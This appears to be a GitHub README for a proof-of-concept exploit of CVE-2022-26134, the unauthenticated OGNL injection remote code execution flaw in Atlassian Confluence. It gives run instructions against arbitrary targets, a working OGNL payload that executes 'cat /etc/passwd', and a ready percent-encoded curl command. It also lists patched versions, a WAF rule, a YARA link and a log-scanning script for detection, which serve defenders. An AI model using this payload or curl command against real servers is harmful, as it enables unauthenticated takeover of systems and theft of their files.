[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE)

Overview

CVE-2022-26134 - OGNL injection vulnerability.

Proof-of-concept script that exploits the remote code execution vulnerability affecting Atlassian Confluence 7.18 and lower. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

Affected versions

All supported versions of Confluence Server and Data Center are affected.
Confluence Server and Data Center versions after 1.3.0 and below 7.18.1 are affected.
The vulnerability has a CVSS score of 10 out of 10 for criticality.

Dependencies:

  • Python 3.3+
  • The dependencies can be satisfied via pip install -r requirements.txt

How to use:

Clone the repo

git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134

Then you can run the exploit with the command of your choice as follows:

python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

Payload

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Example with a curl command:

curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

The output of the command is then returned in the X-Cmd-Response header of the response.

Mitigation guidelines from the vendor

Follow the official recommendations from Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Patched Versions

Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a patch for this issue.

Detection capabilities

This vulnerability affects all self-hosted instances. If you use a WAF, you can block URLs containing ${.

YARA (by Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
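
The curl example above sends the expression percent-encoded (%24%7B), so a match on ${ has to run against the decoded URL. The following log triage script is an added example, not part of the original repository; it assumes Combined Log Format access logs, and the sample lines, severity labels and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: client ... "METHOD URI PROTOCOL" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Substrings of the payload shown on this page; their presence raises severity.
OGNL_MARKERS = ("@java.lang.Runtime", "getRuntime(", "ServletActionContext")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2022:10:15:02 +0000] "GET /dashboard.action HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jun/2022:10:15:09 +0000] "HEAD /%24%7B%28%23a%3D%40java.lang.Runtime'
    '%40getRuntime%28%29%29%7D/ HTTP/1.1" 302 0',
    '203.0.113.9 - - [03/Jun/2022:10:15:11 +0000] "GET /%2524%257B7*7%257D/ HTTP/1.1" 302 0',
    '198.51.100.4 - - [03/Jun/2022:10:16:40 +0000] "GET /pages/viewpage.action?pageId=%2440 HTTP/1.1" 200 2048',
]

def fully_decode(uri, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2524%257B) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def classify(line):
    """Return None, or (client_ip, status, severity, decoded_uri) for a suspicious line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    uri = fully_decode(m.group("uri"))
    if "${" not in uri:
        return None
    severity = "high" if any(k in uri for k in OGNL_MARKERS) else "medium"
    return m.group("ip"), int(m.group("status")), severity, uri

def scan(lines):
    """Collect every suspicious request from an iterable of access-log lines."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, status, severity, uri in scan(SAMPLE_LOG):
        print(f"{severity:6} {ip} -> {status} {uri}")
```

A hit only shows that an expression was sent; whether it was evaluated depends on the instance running one of the unpatched versions listed above.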

Note

FOR EDUCATIONAL PURPOSE ONLY.

Owner

Samy Younsi
Finding bugs and writing codes that break codes.